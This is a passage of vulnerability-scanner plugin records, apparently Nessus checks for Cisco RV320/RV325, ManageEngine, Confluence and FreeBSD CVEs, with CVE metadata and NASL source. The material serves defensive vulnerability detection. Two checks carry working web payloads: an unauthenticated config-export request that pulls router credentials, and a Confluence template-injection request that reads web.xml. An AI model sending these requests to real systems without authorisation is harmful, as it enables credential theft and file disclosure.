(CVE-2019-1653)\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for\nmore information\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f54bf7af\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2764da3f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm78058\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg85922\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm78058 & CSCvg85922\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1652\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-1653\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cisco RV320 and RV325 Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 284);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/15\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:cisco:small_business_rv_series_router_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_small_business_detect.nasl\", \"cisco_rv_webui_detect.nbin\");\n script_require_keys(\"Cisco/Small_Business_Router/Version\", \"Cisco/Small_Business_Router/Model\");\n\n exit(0);\n}\n\ninclude('cisco_workarounds.inc');\ninclude('ccf.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Small Business Series Router Firmware');\n\nvuln_list = [\n {'min_ver' : '1.4.2.15', 'fix_ver' : '1.4.2.22'}\n];\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'fix' , '1.4.2.22',\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvm78058 & CSCvg85922',\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_list,\n models:make_list('RV320', 'RV325')\n);\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:13", "description": "According to its self-reported version, this Cisco Small Business RV320 router is affected by multiple vulnerabilities:\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. 
A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. (CVE-2019-1652)\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. (CVE-2019-1653)", "cvss3": {"score": 7.2, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-16T00:00:00", "type": "nessus", "title": "Cisco RV325 < 1.4.2.22 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-04-16T00:00:00", "cpe": ["cpe:2.3:h:cisco:rv325:*:*:*:*:*:*:*:*"], "id": "700567.PRM", "href": "https://www.tenable.com/plugins/nnm/700567", "sourceData": "Binary data 700567.prm", "cvss": {"score": 9, "vector": "CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:12", "description": "According to its self-reported version, this Cisco Small Business RV320 router is affected by multiple vulnerabilities:\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. 
(CVE-2019-1652)\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. (CVE-2019-1653)", "cvss3": {"score": 7.2, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-16T00:00:00", "type": "nessus", "title": "Cisco RV320 < 1.4.2.22 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-04-16T00:00:00", "cpe": ["cpe:2.3:h:cisco:rv320:*:*:*:*:*:*:*:*"], "id": "700566.PRM", "href": "https://www.tenable.com/plugins/nnm/700566", "sourceData": "Binary data 700566.prm", "cvss": {"score": 9, "vector": "CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T15:08:10", "description": "The remote Cisco Small Business router is affected by a remote information disclosure vulnerability. A remote, unauthenticated attacker can exploit this, via a simple HTTP GET or POST request, to obtain the configuration of the router. 
This configuration includes device credentials in the form of a plaintext username and an MD5 hashed password that is trivial to crack.\n\nThese credentials could then be used to authenticate to the router and can be leveraged with a command injection vulnerability (CVE-2019-1652) to allow an attacker to execute arbitrary commands.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-01-25T00:00:00", "type": "nessus", "title": "Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability (cisco-sa-20190123-rv-info) (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/h:cisco:rv320_dual_gigabit_wan_vpn_router", "cpe:/h:cisco:rv320_dual_gigabit_wan_wf_vpn_router", "cpe:/h:cisco:rv325_dual_gigabit_wan_vpn_router", "cpe:/h:cisco:rv325_dual_gigabit_wan_wf_vpn_router"], "id": "CISCO-SA-20190123-RV-INFO_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/121395", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121395);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2019-1653\");\n script_bugtraq_id(106732);\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20190123-rv-info\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvg85922\");\n script_xref(name:\"IAVA\", value:\"2019-A-0356\");\n script_xref(name:\"IAVA\", value:\"0001-A-0009-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability (cisco-sa-20190123-rv-info) (remote check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information 
disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco Small Business router is affected by a remote\ninformation disclosure vulnerability. A remote, unauthenticated\nattacker can exploit this, via a simple HTTP GET or POST request, to\nobtain the configuration of the router. This configuration includes\ndevice credentials in the form of a plaintext username and an MD5\nhashed password that is trivial to crack.\n\nThese credentials could then be used to authenticate to the router\nand can be leveraged with a command injection vulnerability\n(CVE-2019-1652) to allow an attacker to execute arbitrary commands.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2764da3f\");\n # https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f0f4af0a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2019/Mar/59\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/0x27/CiscoRV320Dump\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to Cisco bug ID CSCvg85922 for any available patches, or\ncontact the vendor for a fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1653\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cisco RV320 and RV325 Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv320_dual_gigabit_wan_vpn_router\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv320_dual_gigabit_wan_wf_vpn_router\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv325_dual_gigabit_wan_vpn_router\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv325_dual_gigabit_wan_wf_vpn_router\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 443, 8000, 8007, 8081, 8443);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"Cisco Small Business RV320 Series Router\";\n\nport = get_http_port(default:443);\n\n# sanity check this is likely to be RV320/RV325\nres = http_get_cache(item:'/', port:port, exit_on_fail:TRUE);\n\nif ('<form name=\"form_contents\" method=\"post\" action=\"/cgi-bin/userLogin.cgi\">' >!< res ||\n '<input type=\"hidden\" name=\"portalname\" value=\"CommonPortal\">' >!< res ||\n '<input type=\"hidden\" name=\"auth_key\"' >!< res)\n{\n audit(AUDIT_WEB_FILES_NOT, app, port);\n}\n\nitem = '/cgi-bin/config.exp';\nres = http_send_recv3(method:'GET', item:item, port:port);\n\nif (isnull(res) ||\n '####sysconfig####' >!< res[2] ||\n 'MODEL=' >!< res[2] ||\n 'PASSWD=' >!< res[2])\n{\n res = http_send_recv3(method:'POST', item:item, data:'submitbkconfig=0', port:port);\n if (isnull(res) ||\n '####sysconfig####' >!< res[2] ||\n 'MODEL=' >!< res[2] ||\n 'PASSWD=' >!< res[2])\n {\n audit(AUDIT_LISTEN_NOT_VULN, app, port);\n }\n else\n method = 'POST';\n}\nelse\n method = 'GET';\n\noutput = data_protection::sanitize_user_full_redaction(output:res[2]);\n\ntrailer = 'Which returns the following page via a ' + method + ' request:\\n\\n' + output;\nreport = get_vuln_report(items:item, port:port, trailer:trailer);\nsecurity_report_v4(severity:SECURITY_WARNING, port:port, extra:report);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-03T18:13:46", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479.\nIt is, therefore, affected by a remote code execution 
vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-10T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2022-08-02T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "href": "https://www.tenable.com/plugins/nessus/135293", "sourceData": "Binary data manageengine_desktop_central_cve-2020-10189.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T14:54:00", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479. It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-19T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "href": "https://www.tenable.com/plugins/nessus/134677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134677);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-10189\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is\naffected by a remote code 
execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote\nhost is version 10 prior to build 100479. It is, therefore, affected by\na remote code execution vulnerability.\");\n # https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b517c025\");\n # https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9944baef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central version 10 build 100479 or\nlater. Alternatively, apply the manual, vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-10189\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine Desktop Central Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# Cannot know if manual workaround is in place.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8020);\n\ninstall = get_single_install(\n app_name : appname,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\nbuild = install[\"build\"];\nismsp = install[\"MSP\"];\nrep_version = version;\n\ninstall_url = build_url(port:port, qs:dir);\n\nif (ismsp) appname += \" MSP\";\n\nif (build == UNKNOWN_VER)\n exit(0, \"The build number of \"+appname+\" version \" +rep_version+ \" listening at \" +install_url+ \" could not be determined.\");\nelse\n rep_version += \" Build \" + build;\n\nbuild = int(build);\nif (version =~ \"^10(\\.|$)\" && build < 100479)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + rep_version +\n '\\n Fixed version : 10 Build 100479' +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:20:47", "description": "According to 
the tests performed by Nessus, the remote host is affected by the following vulnerability:\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. (CVE-2019-3396)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-11T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2019-3396.NASL", "href": "https://www.tenable.com/plugins/nessus/124004", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124004);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-3396\");\n script_xref(name:\"IAVA\", value:\"2019-A-0135-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by\na template injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the tests performed by Nessus, the remote host\nis affected by the following vulnerability:\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. 
(CVE-2019-3396)\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8e8304c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.6.12, 6.12.3, 6.13.3,\n6.14.2, 6.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-3396\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Confluence File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Widget Connector Macro Velocity Template Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp_name = 'confluence';\n\nport = get_http_port(default:8090);\n\napp_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\npath = app_info['path'];\nif(path[strlen(path)-1] != '/') path += '/';\n\nitem = path + 'rest/tinymce/1/macro/preview';\nheader = {'Content-Type':'application/json','User-Agent':''};\ndata = '{\"contentId\":\"1337\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":' +\n '{\"url\":\"http://localhost//www.youtube.com/watch?v=w0gtNxBWIEY\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}';\n\nres = http_send_recv3(method:'POST', item:item, port:port, add_headers:header, data:data, exit_on_fail:TRUE);\n\nif('</web-app>' >< res[2])\n security_report_v4(severity:SECURITY_HOLE, port:port, generic:TRUE, request:[http_last_sent_request()]);\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Atlassian Confluence', build_url(qs:path, port:port));\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:05:13", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12, 6.7.0 < 6.12.3, 6.13.0 < 6.13.3 and 6.14.0 < 6.14.2 allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\nThis vulnerability has been verified using a remote check and should be remediated 
immediately.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-30T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2021-09-07T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_98613", "href": "https://www.tenable.com/plugins/was/98613", "sourceData": "No source data", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:25:08", "description": "Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for untrusted template files to cause reads/writes outside of the template directories. This vulnerability is a component of the recent Citrix exploit.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-15T00:00:00", "type": "nessus", "title": "FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2022-02-25T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:p5-Template-Toolkit", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "href": "https://www.tenable.com/plugins/nessus/132879", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132879);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2019-19781\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n 
